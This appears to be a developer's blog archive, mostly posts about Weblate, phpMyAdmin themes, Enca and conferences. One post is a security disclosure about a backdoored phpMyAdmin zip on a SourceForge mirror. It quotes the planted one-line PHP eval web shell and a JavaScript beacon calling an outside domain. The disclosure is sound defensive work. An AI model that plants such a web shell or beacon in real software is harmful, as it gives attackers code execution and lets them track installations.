Michal Čihař - Blog Archives for English

Playing with HTML microdata

Since Google introduced support for "Rich snippets", I've wanted to play with that technology a bit. I've already used microformats in the past, but today's preferred solution seems to be microdata, which plays nicely with HTML 5.

To have some real data to show, I've chosen spolecneaktivity.cz, a community site for free time activities (sorry, it is Czech only). It provides me with an XML export of some data to play with.

After a little bit of hacking, I wrote a Python script to parse that and output HTML with all the microdata details I've found in the original XML. The output now lives at http://cihar.com/aktivity/ and Google's Structured Data Testing Tool seems to parse this just fine.

The only question is whether it will show up in the results sometimes as it warns "urls are pointing to a different domain than the base url".

Weblate 1.3 on l10n.cihar.com

As the Weblate release is getting closer, I've decided to give the new version more real-life testing, and it has been deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features; the most interesting for users might be:

  • Better and new consistency checking.
  • Better support for Android resources.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.

You can see the full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

RSS feeds and feature freeze of Weblate 1.3

Yesterday I completed the last big feature I wanted to have for Weblate 1.3 - improved change tracking and exporting it as an RSS feed.

You can find an example of this feature on the data exports page on the demo server; it is also covered in the documentation. I think there is not much to describe here, these are simple RSS feeds which will contain all the important things happening to a translation.

This being the last major feature, we're now aiming at stabilization and bug fixes. I expect this phase will take two weeks, during which I plan to deploy the new version to http://l10n.cihar.com/ (probably next week).

If you can help with testing, you're welcome to help and report bugs.

Weblate brings source strings checks and review

Weblate 1.3 will bring several new features. One of the recently implemented parts is source strings review.

Translators quite often find some problems with the original string, be it a typo, wrong wording, or simply a message that is hard to understand. In Weblate 1.3 they will have an option to push feedback to developers. The feedback is stored within Weblate and can optionally be sent to a configured email address.

In addition to this, there are now checks for source strings as well, which might help you to improve their quality. The new checks are of course covered in the documentation.

You can already try the current Weblate on http://demo.weblate.org/, though there are still some things which need polishing.

oSC12 wrap up

As the openSUSE Conference and all related events are over, it's time to share my thoughts on how it was.

This was actually the first conference ever where I helped with organizing, so it was quite a new experience for me. A week before it happened I expected quite a lot of problems, but in the end everything went more or less smoothly.

Having something like 700-800 visitors is IMHO great for the first year of LinuxDays, even though it was co-located with other conferences. Most people came on Saturday and there were fewer of them on Sunday. Maybe it was a result of the party, which lasted for many of them till early morning (I left around 1 AM and there were still a lot of people drinking).

Besides organizing stuff, I also had my own talk about Weblate. Unfortunately not many people attended it, but those who did gave me some valuable feedback which will be reflected in the next Weblate release. Anyway, if you want to see my slides from this talk, they are now available on my website.

New phpMyAdmin theme

Today, I've finally found time to process new themes for phpMyAdmin. The result of this is two theme releases.

The first one was just a minor update to an older theme (Darkblue/orange 2.11), which fixed behavior in Internet Explorer.

The second one was a completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually the first contributed theme compatible with the 3.5 series.

Of course you can find all of these on our themes page.

Bootstrapping awesome in Prague this weekend

This weekend there is going to be a lot happening in Prague - an awesome combination of four conferences will happen here.

I'm sure this will be a really great event with a lot of interesting things on the schedule. Even if you are not interested in technical stuff, the future media track might be interesting for you. And of course the event includes a huge party on Saturday evening (and a welcome party with pre-registration on Friday).

Anyway, if you will be around, you can meet me somewhere there, usually within the organizers' crew.

PS: There is also a nice summary of the latest news available now.

Think twice before making your private data public

Data, once put on the internet, are quite hard to delete. You can most likely delete them (or ask for their deletion) from the place where they were originally distributed, but you can never be sure where else they have appeared.

Recently, I've seen several requests to remove some data from the Gammu testsuite. This testsuite was created using public data available in our bug tracker, simply to be able to verify that we won't break stuff which was fixed earlier.

It turns out that some people did make some very private stuff public, which was included in the testsuite in the end. None of the developers had a clue about the content of these messages, as they were in a language which none of us understands (and we were too lazy to run them through Google translator to understand them).

Of course we've removed the data on request, but it's probably already copied in a dozen other places on the internet...

Compromised SourceForge mirror

Yesterday, the phpMyAdmin security team was notified about a backdoor being distributed together with the phpMyAdmin zip file on one of the SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in the phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code; there was a file called server_sync.php which simply called eval on the passed data:

<?php @eval($_POST['c']);?>

In addition to this, JavaScript code was included, which could allow an attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all, it looks like a simple but quite effective way to install a backdoor, if they had been able to spread it more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spotted quite fast (looking at the domain used, the exploit could not have been live before 22nd September 2012) and not on a very frequently used mirror (based on the official SourceForge statement, about 400 users have downloaded the file with the backdoor).

What still remains unclear is whether this was really targeted only at phpMyAdmin, or whether there were more modified files on this mirror (SourceForge hosts thousands of projects). I randomly tried a few of our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do a more systematic analysis, so this question can now be answered only by SourceForge.

Enca 1.14

Seems I've forgotten to announce Enca 1.13 here, but I won't make the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects the character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. Its code is currently available at Gitorious.

The full changes for 1.14 release are short:

  • Allow standard names for Belarusian and Slovenian languages, thanks to Branislav Geržo for the suggestion.
  • Reset strictness when the check buffer is less than the file size, thanks to Sam Liao.
  • Fixed typos in man page, thanks to A. Costa.

Enca is still in maintenance mode only and I have no intention of writing new features. However, there is no limitation for other contributors :-).

You can download from http://cihar.com/software/enca/.